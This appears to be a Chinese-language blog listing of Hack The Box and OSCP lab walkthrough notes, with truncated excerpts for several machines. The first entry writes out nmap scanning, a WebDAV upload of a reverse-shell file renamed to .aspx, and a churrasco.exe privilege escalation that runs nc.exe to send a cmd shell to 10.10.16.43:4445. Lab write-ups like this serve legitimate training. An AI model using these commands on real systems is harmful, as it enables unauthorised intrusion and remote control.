nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)
发现有webdav可以利用
davtest -url http://10.10.16.43 ----可以查看到哪些后缀可以进行上传
cadaver http://10.10.16.43
put reverse_shell.txt
move reverse_shell.txt reverse_shell.aspx
然后上传反弹SHELL挡案
然后提权systeminfo
C:\Inetpub\wwwroot\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -nv 10.10.16.43 4445 -e cmd"
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...
名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...
grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...
ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...
刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...
